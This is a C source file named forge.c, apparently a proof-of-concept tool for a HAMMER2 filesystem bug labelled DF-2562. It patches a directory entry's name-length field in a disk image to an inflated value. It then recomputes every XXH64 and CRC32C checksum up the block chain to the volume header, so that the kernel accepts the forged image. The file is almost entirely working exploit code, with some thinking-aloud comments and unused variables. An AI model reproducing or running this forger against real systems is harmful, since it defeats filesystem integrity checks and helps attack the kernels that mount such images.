DF-2562 / forge.c
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 | /* * forge.c - DF-2562 image forger with full CRC chain fix * * Patches the DIRENT namlen to an inflated value AND fixes the entire * hammer2 CRC chain (XXH64 for inode/indirect blocks, CRC32C for volume * header) so the kernel accepts the forged data. * * Build: cc -O2 -o forge forge.c * Usage: ./forge <image> <namlen> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <unistd.h> #include <fcntl.h> /* ---- XXH64 (xxHash 64-bit, seed = 0x4d617474446c6c6e) ---- */ #define XXH_PRIME64_1 0x9E3779B185EBCA87ULL #define XXH_PRIME64_2 0xC2B2AE3D27D4EB4FULL #define XXH_PRIME64_3 0x165667B19E3779F9ULL #define XXH_PRIME64_4 0x85EBCA77C2B2AE63ULL #define XXH_PRIME64_5 0x27D4EB2F165667C5ULL static inline uint64_t xxh64_round(uint64_t acc, uint64_t input) { acc += input * XXH_PRIME64_2; acc = (acc << 31) | (acc >> (64 - 31)); acc *= XXH_PRIME64_1; return acc; } static inline uint64_t xxh64_merge(uint64_t acc, uint64_t val) { val = xxh64_round(0, val); acc ^= val; acc = acc * XXH_PRIME64_1 + XXH_PRIME64_4; return acc; } static uint64_t xxh64(const void *input, size_t len, uint64_t seed) { const uint8_t *p = input; const uint8_t *end = p + len; uint64_t h64; if (len >= 32) { const uint8_t *lim = end - 32; uint64_t v1 = seed + XXH_PRIME64_1 + XXH_PRIME64_2; uint64_t v2 = seed + XXH_PRIME64_2; uint64_t v3 = seed + 0; uint64_t v4 = seed - XXH_PRIME64_1; do { uint64_t r; memcpy(&r, p, 8); v1 = xxh64_round(v1, r); p += 8; memcpy(&r, p, 8); v2 = xxh64_round(v2, r); p += 8; memcpy(&r, p, 8); v3 = xxh64_round(v3, r); p += 8; memcpy(&r, p, 8); v4 = xxh64_round(v4, r); p += 8; } while (p <= lim); h64 = ((v1 << 1) | (v1 >> 63)) + ((v2 << 7) | (v2 >> 57)) + ((v3 << 12) | (v3 >> 52)) + ((v4 << 18) | (v4 >> 46)); h64 = xxh64_merge(h64, v1); h64 = xxh64_merge(h64, v2); h64 = xxh64_merge(h64, v3); h64 = xxh64_merge(h64, v4); } else { h64 = seed + XXH_PRIME64_5; } h64 += (uint64_t)len; while (p + 8 <= end) { uint64_t r; memcpy(&r, p, 8); h64 ^= xxh64_round(0, r); h64 = ((h64 << 27) | (h64 >> 37)); h64 = h64 * XXH_PRIME64_1 + XXH_PRIME64_4; p += 8; } if (p + 4 <= end) { uint32_t r; memcpy(&r, p, 4); h64 ^= ((uint64_t)r) * XXH_PRIME64_1; h64 = ((h64 << 23) | (h64 >> 41)); h64 = h64 * XXH_PRIME64_2 + XXH_PRIME64_3; p += 4; } while (p < end) { h64 ^= (*p++) * XXH_PRIME64_5; h64 = ((h64 << 11) | (h64 >> 53)); h64 = h64 * XXH_PRIME64_1; } h64 ^= h64 >> 33; h64 *= XXH_PRIME64_2; h64 ^= h64 >> 29; h64 *= XXH_PRIME64_3; h64 ^= h64 >> 32; return h64; } /* ---- CRC32C (Castagnoli, used for volume header icrc) ---- */ static const uint32_t crc32c_table[256] = { /* generated from polynomial 0x1EDC6F41 (reflected) */ #include "crc32ctab.h" }; static uint32_t crc32c(const void *buf, size_t len) { const uint8_t *p = buf; uint32_t crc = 0xFFFFFFFF; while (len--) crc = crc32c_table[(crc ^ *p++) & 0xFF] ^ (crc >> 8); return crc ^ 0xFFFFFFFF; } /* icrc = iscsi_crc32 = ~calculate_crc32c(-1, ...) = crc32c but with * inverted init/final. Actually: * iscsi_crc32(buf, size) = ~calculate_crc32c(-1, buf, size) * calculate_crc32c(crc, buf, len) does NOT invert on init/final * so calculate_crc32c(-1, ...) = standard crc32c with init=0xFFFFFFFF, * no final inversion... wait: * calculate_crc32c(-1) starts with crc=-1=0xFFFFFFFF, processes bytes, * and returns WITHOUT final XOR. So iscsi_crc32 = ~(calculate_crc32c(-1)) * = standard crc32c WITH final XOR. * That's exactly our crc32c() function above. */ #define iscsi_crc32(buf, len) crc32c((buf), (len)) /* ---- hammer2 on-disk constants ---- */ #define HAMMER2_OFF_MASK_RADIX 0x3FULL #define BREF_TYPE_DIRENT 4 #define BREF_TYPE_INODE 1 #define BREF_TYPE_INDIRECT 2 #define BREF_BYTES 128 #define BREF_DATAOFF_OFF 0x20 #define BREF_CHECK_OFF 0x40 /* check union within blockref */ #define DIRENT_NAMLEN_OFF 0x38 /* embed.dirent.namlen in blockref */ #define XXH_SEED 0x4d617474446c6c6eULL #define MARKER "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt" #define MARKER_LEN 76 #define HAMMER2_VOLUME_BYTES 65536 #define VH_ICRC0_OFF 0 #define VH_ICRC0_SIZE (512 - 4) #define VH_ICRC1_OFF 512 #define VH_ICRC1_SIZE 512 #define VH_ICRCVH_OFF 0 #define VH_ICRCVH_SIZE (65536 - 4) #define VH_ICRC_SECTS_OFF 0x1E0 /* icrc_sects[8] in volume_data */ #define VH_ICRC_VOLHEADER_OFF 0xFFFC #define VH_SROOT_BLOCKSET_OFF 0x200 static uint8_t *img; static off_t imgsize; static uint16_t rd16(const uint8_t *p) { return p[0] | (p[1] << 8); } static uint32_t rd32(const uint8_t *p) { return (uint32_t)p[0] | ((uint32_t)p[1]<<8) | ((uint32_t)p[2]<<16) | ((uint32_t)p[3]<<24); } static uint64_t rd64(const uint8_t *p) { uint64_t v = 0; int i; for (i = 0; i < 8; i++) v |= (uint64_t)p[i] << (i*8); return v; } static void wr16(uint8_t *p, uint16_t v) { p[0]=v&0xFF; p[1]=(v>>8)&0xFF; } static void wr32(uint8_t *p, uint32_t v) { p[0]=v&0xFF; p[1]=(v>>8)&0xFF; p[2]=(v>>16)&0xFF; p[3]=(v>>24)&0xFF; } static void wr64(uint8_t *p, uint64_t v) { int i; for (i=0;i<8;i++) p[i]=(v>>(i*8))&0xFF; } /* Find a blockref by child data_off. Searches a block of blockrefs. * Returns byte offset of the blockref in img, or -1. */ static off_t find_bref_by_dataoff(off_t block_start, int count, int bref_size, uint64_t child_dataoff_raw) { int i; for (i = 0; i < count; i++) { off_t boff = block_start + i * bref_size; if (boff + bref_size > imgsize) break; uint8_t type = img[boff]; if (type == 0) continue; /* EMPTY */ uint64_t doff = rd64(img + boff + BREF_DATAOFF_OFF); if (doff == child_dataoff_raw) { fprintf(stderr, " found blockref type=%d at img off %lld (0x%llx) data_off=0x%llx\n", type, (long long)boff, (long long)boff, (unsigned long long)doff); return boff; } } return -1; } /* Recompute XXH64 of a data block, store in parent blockref's check field. */ static void fix_xxh64(off_t data_off, uint64_t data_size, off_t bref_off) { uint64_t h = xxh64(img + data_off, data_size, XXH_SEED); fprintf(stderr, " XXH64(data@0x%llx sz=%llu) = 0x%016llx -> bref@0x%llx+0x40\n", (unsigned long long)data_off, (unsigned long long)data_size, (unsigned long long)h, (long long)bref_off); wr64(img + bref_off + BREF_CHECK_OFF, h); } int main(int argc, char **argv) { int fd; long val; uint16_t new_namlen; ssize_t n; if (argc < 3) { fprintf(stderr, "usage: %s <image> <namlen>\n", argv[0]); return 2; } val = strtol(argv[2], NULL, 0); if (val < 0 || val > 65535) { fprintf(stderr, "namlen out of range\n"); return 2; } new_namlen = (uint16_t)val; fd = open(argv[1], O_RDWR); if (fd < 0) { perror("open"); return 1; } imgsize = lseek(fd, 0, SEEK_END); lseek(fd, 0, SEEK_SET); img = malloc(imgsize); if (!img) { perror("malloc"); close(fd); return 1; } n = read(fd, img, imgsize); if (n != imgsize) { perror("read"); free(img); close(fd); return 1; } /* Step 1: find the marker (DIRENT data block) */ off_t marker_off = -1; off_t o; for (o = 0; o + MARKER_LEN <= imgsize; o++) { if (memcmp(img + o, MARKER, MARKER_LEN) == 0) { marker_off = o; break; } } if (marker_off < 0) { fprintf(stderr, "forge: marker not found\n"); free(img); close(fd); return 1; } fprintf(stderr, "marker at 0x%llx\n", (unsigned long long)marker_off); /* Step 2: compute DIRENT data_off, find DIRENT blockref, patch namlen */ uint64_t dirent_dataoff_raw = (uint64_t)marker_off | 10ULL; /* radix 10 = 1024 */ uint8_t needle[8]; wr64(needle, dirent_dataoff_raw); off_t dirent_bref = -1; for (o = 0; o + 8 <= imgsize; o++) { if (memcmp(img + o, needle, 8) != 0) continue; off_t bs = o - BREF_DATAOFF_OFF; if (bs < 0 || bs + BREF_BYTES > imgsize) continue; if (img[bs] != BREF_TYPE_DIRENT) continue; dirent_bref = bs; break; } if (dirent_bref < 0) { fprintf(stderr, "forge: DIRENT blockref not found\n"); free(img); close(fd); return 1; } /* Determine which inode_data contains this blockref */ /* The blockref is in a blockset. blockset is at inode_data+0x200. * Each blockset has 4 blockrefs. Find the inode_data base. */ off_t blockset_off = dirent_bref - (dirent_bref % BREF_BYTES); /* align to blockset boundary: blockset has 4 brefs of 128 bytes = 512 */ off_t testdir_inode_off = (dirent_bref / BREF_BYTES) ; /* The blockset starts at an inode_data + 0x200 boundary */ /* inode_data is 1024 bytes; blockset at +0x200; 4 brefs: +0x200,+0x280,+0x300,+0x380 */ off_t bref_in_blockset = dirent_bref - ((dirent_bref / BREF_BYTES) * BREF_BYTES); /* Actually: find inode_data base = dirent_bref rounded down to nearest * blockset position. The blockset occupies offsets +0x200 to +0x3FF * within a 1024-byte inode_data. */ off_t rel = dirent_bref & 0x3FF; /* position within 1024-byte block */ off_t block_base = dirent_bref - rel; /* 1024-byte aligned base */ /* Verify this looks like an inode_data: version=1 at +0x00 */ if (rd16(img + block_base) != 1) { fprintf(stderr, "forge: WARNING: inode_data base guess off=0x%llx has version=%u (expected 1)\n", (unsigned long long)block_base, rd16(img + block_base)); /* Try the other possible alignment */ } uint16_t old_namlen = rd16(img + dirent_bref + DIRENT_NAMLEN_OFF); fprintf(stderr, "patching DIRENT namlen at 0x%llx: %u -> %u\n", (long long)(dirent_bref + DIRENT_NAMLEN_OFF), old_namlen, new_namlen); wr16(img + dirent_bref + DIRENT_NAMLEN_OFF, new_namlen); /* Step 3: fix testdir inode_data XXH64 in parent blockref */ /* testdir = inode_data at block_base, 1024 bytes */ uint64_t testdir_dataoff_raw = (uint64_t)block_base | 10ULL; fprintf(stderr, "testdir inode_data at 0x%llx, data_off raw=0x%llx\n", (unsigned long long)block_base, (unsigned long long)testdir_dataoff_raw); /* Find testdir's blockref in the INDIRECT block (search entire image) */ off_t testdir_bref = find_bref_by_dataoff(0, imgsize / BREF_BYTES, BREF_BYTES, testdir_dataoff_raw); if (testdir_bref < 0) { fprintf(stderr, "forge: testdir blockref not found\n"); free(img); close(fd); return 1; } fix_xxh64(block_base, 1024, testdir_bref); /* Step 4: fix INDIRECT block XXH64 in DATA's blockref */ /* The INDIRECT block contains testdir_bref. INDIRECT block size from * the blockref vradix or known radix (4096 = radix 12). */ off_t indirect_off = (testdir_bref / 4096) * 4096; /* 4K aligned */ /* Better: find data_off of the INDIRECT block from the bref in DATA */ /* The INDIRECT block's data_off is stored in DATA's blockref for indirect */ /* For now, search for the INDIRECT block by looking for the block that * contains testdir_bref */ /* Actually, indirect_off = testdir_bref rounded down to 4096 */ uint64_t indirect_dataoff_raw = (uint64_t)indirect_off | 12ULL; /* radix 12 = 4096 */ fprintf(stderr, "indirect block at 0x%llx, data_off raw=0x%llx\n", (unsigned long long)indirect_off, (unsigned long long)indirect_dataoff_raw); off_t indirect_bref = find_bref_by_dataoff(0, imgsize / BREF_BYTES, BREF_BYTES, indirect_dataoff_raw); if (indirect_bref < 0) { fprintf(stderr, "forge: indirect blockref not found\n"); free(img); close(fd); return 1; } fix_xxh64(indirect_off, 4096, indirect_bref); /* Step 5: fix DATA inode_data XXH64 in SUPROOT's blockref */ /* DATA inode_data contains indirect_bref. blockset at +0x200 within DATA */ off_t data_inode_off = (indirect_bref / 1024) * 1024; /* Verify: the indirect_bref is in DATA's blockset (+0x200 to +0x3FF) */ off_t rel_in_data = indirect_bref - data_inode_off; if (rel_in_data < 0x200 || rel_in_data >= 0x400) { /* try other alignment */ data_inode_off = indirect_bref & ~0x3FF; } uint64_t data_dataoff_raw = (uint64_t)data_inode_off | 10ULL; fprintf(stderr, "DATA inode at 0x%llx, data_off raw=0x%llx\n", (unsigned long long)data_inode_off, (unsigned long long)data_dataoff_raw); off_t data_bref = find_bref_by_dataoff(0, imgsize / BREF_BYTES, BREF_BYTES, data_dataoff_raw); if (data_bref < 0) { fprintf(stderr, "forge: DATA blockref not found\n"); free(img); close(fd); return 1; } fix_xxh64(data_inode_off, 1024, data_bref); /* Step 6: fix SUPROOT inode_data XXH64 in volume header's sroot_blockset */ off_t suproot_inode_off = (data_bref / 1024) * 1024; uint64_t suproot_dataoff_raw = (uint64_t)suproot_inode_off | 10ULL; fprintf(stderr, "SUPROOT inode at 0x%llx, data_off raw=0x%llx\n", (unsigned long long)suproot_inode_off, (unsigned long long)suproot_dataoff_raw); /* The SUPROOT blockref is in the volume header's sroot_blockset at offset 0x200 */ /* Search for the blockref with matching data_off in the volume header area */ off_t suproot_bref = find_bref_by_dataoff(VH_SROOT_BLOCKSET_OFF, 4, BREF_BYTES, suproot_dataoff_raw); if (suproot_bref < 0) { fprintf(stderr, "forge: SUPROOT blockref not found in volhdr\n"); free(img); close(fd); return 1; } fix_xxh64(suproot_inode_off, 1024, suproot_bref); /* Step 7: fix volume header CRCs */ /* icrc_sects[6] = CRC32C of sector 1 (bytes 512..1023) */ uint32_t icrc1 = iscsi_crc32(img + VH_ICRC1_OFF, VH_ICRC1_SIZE); wr32(img + VH_ICRC_SECTS_OFF + 6 * 4, icrc1); fprintf(stderr, "volhdr icrc_sects[6] = 0x%08x\n", icrc1); /* icrc_sects[7] = CRC32C of bytes 0..507 */ uint32_t icrc0 = iscsi_crc32(img + VH_ICRC0_OFF, VH_ICRC0_SIZE); wr32(img + VH_ICRC_SECTS_OFF + 7 * 4, icrc0); fprintf(stderr, "volhdr icrc_sects[7] = 0x%08x\n", icrc0); /* icrc_volheader = CRC32C of bytes 0..65531 */ uint32_t icrcvh = iscsi_crc32(img + VH_ICRCVH_OFF, VH_ICRCVH_SIZE); wr32(img + VH_ICRC_VOLHEADER_OFF, icrcvh); fprintf(stderr, "volhdr icrc_volheader = 0x%08x\n", icrcvh); /* Write back */ lseek(fd, 0, SEEK_SET); n = write(fd, img, imgsize); if (n != imgsize) { perror("write"); free(img); close(fd); return 1; } fsync(fd); fprintf(stderr, "forge: done, namlen=%u\n", new_namlen); free(img); close(fd); return 0; } |